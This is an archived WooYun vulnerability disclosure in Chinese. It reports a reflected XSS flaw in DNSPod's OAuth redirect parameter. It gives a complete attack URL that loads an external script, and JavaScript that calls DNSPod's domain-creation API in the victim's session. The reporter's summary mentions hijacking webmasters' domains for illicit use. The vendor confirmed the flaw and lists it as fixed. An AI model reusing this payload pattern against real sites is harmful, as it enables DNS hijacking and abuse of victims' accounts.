当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041349

漏洞标题:dnspod的xss漏洞,可以控制受害者域名

相关厂商:DNSPod

漏洞作者: yimi

提交时间:2013-10-29 12:54

修复时间:2013-12-13 12:55

公开时间:2013-12-13 12:55

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-29: 细节已通知厂商并且等待厂商处理中
2013-10-29: 厂商已经确认,细节仅向厂商公开
2013-11-08: 细节向核心白帽子及相关领域专家公开
2013-11-18: 细节向普通白帽子公开
2013-11-28: 细节向实习白帽子公开
2013-12-13: 细节向公众公开

简要描述:

这个xss对于定点攻击非常有用,找到站长,插他就可以给他添加子域名搞黑产,删除他域名解析气死他。话说为毛不过呀~~呜呜

详细说明:

添加域名的攻击链接(请将js的URL替换为你的,里面的内容自己复制进去,删除或者搞黑产的做·添加子域名也是类似的手法):

https://www.dnspod.cn/OAuth/Authorize?client_id=10005shit&redirect_uri=https%3A%2F%2Fsupport.dnspod.cn%2FSupport%2Flogincallback%22/%3E%3Cscript/src=//JS地址%3E%3C/script%3E%3Cimg\%22&response_type=code


JS脚本内代码:

oAjax=new XMLHttpRequest();
oAjax.open("POST","https://www.dnspod.cn/Api/Domain.Create",true);
oAjax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
oAjax.send("format=json&lang=cn&error_on_empty=no&use_session=yes&domain=baibaidudu2.com&group_id=1&is_mark=no");


=======================
另外分析了获取域名列表的接口:
https://www.dnspod.cn/Api/Domain.List
post参数:
format=json&lang=cn&error_on_empty=no&use_session=yes&group_id=0&type=recent&offset=0&length=15

漏洞证明:

详细说明内有了,你访问攻击链接就可以添加一个domain

修复方案:

过滤参数

版权声明:转载请注明来源 yimi@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2013-10-29 13:56

厂商回复:

感谢yimi提醒,我们马上处理

最新状态:

2013-10-31:已经修复,非常感谢yimi 


漏洞评价:

评论

  1. 2013-10-29 12:58 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  2. 2013-11-28 17:39 | Cyrils ( 实习白帽子 | Rank:45 漏洞数:10 | the more the better)

    mark…现在用cloudflare